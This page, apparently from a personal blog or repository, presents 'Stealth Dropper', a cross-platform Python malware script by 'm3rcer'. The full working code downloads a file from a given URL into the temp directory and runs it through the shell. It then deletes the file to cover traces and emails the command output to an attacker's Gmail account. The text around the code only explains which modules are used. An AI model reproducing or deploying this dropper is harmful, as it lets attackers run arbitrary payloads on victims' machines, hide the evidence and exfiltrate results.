Malware - Stealth Dropper


m3rcer

A Cross Platform python script that downloads, executes, reports and cleans up after.

  • We implement:

    the tempfile module - to find the temp dir.

    the os module - to use platform independent functions like chdir to change to the temp dir.

    the subprocess module - to execute and remove the created file.

    the smtplib module - to create an SMTP instance to send our reports back to our proviced mail address.

Code: 

#!/usr/bin/env python

import requests, subprocess, smtplib, os, tempfile, argparse

# Cross-Platform
# Works by default with google's SMTP


def get_arguments():
    parser = argparse.ArgumentParser()
    parser.add_argument("-d", "--download-file", dest="download", help="File to Download")
    parser.add_argument("-a", "--args", dest="args", help="args if provided by Download file")
    parser.add_argument("-e", "--email", dest="email", help="Email-ID to recieve report")
    parser.add_argument("-p", "--password", dest="password", help="Password for provided Email-ID")
    options = parser.parse_args()
    if not options.download:
        # code to handle error
        parser.error("\n[-] Please specify a valid download url,  use --help for info.")
    if not options.email:
        # code to handle error
        parser.error("\n[-] Please specify a valid Email-ID,  use --help for info.")
    return options


def download(url):
    get_response = requests.get(url)
    file_name = url.split("/")[-1]
    # Open File with write and binary mode
    with open(file_name, "wb") as out_file:
        out_file.write(get_response.content)
    return file_name

def send_mail(email, password, message):
    # Google's SMTP definition
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()


print("""\n\n\n
                                                        π•Ύπ–™π–Šπ–†π–‘π–™π–-π•―π–—π–”π–•π–•π–Šπ–—
    """)


print("\n{-} Finding /tmp dir.")
options = get_arguments()


# Find /tmp dir on OS
temp_directory = tempfile.gettempdir()
os.chdir(temp_directory)
print("{+} /tmp dir found!")

# Download
file_name = download(options.download)
print("\n{+} File " + file_name + " has been succesfully dropped!")
# Execute
result = subprocess.check_output(file_name + " " +  options.args, shell=True)
print("{+} File " + file_name + " has been succesfully Executed!")
# Remove
os.remove(file_name)
print("{+} File " + file_name + " has been succesfully Removed!")
# Report
send_mail(options.email, options.password, result)
print("\n\n{!} Report sent to: " + options.email)

Output:

Console:

Image

Report:

Image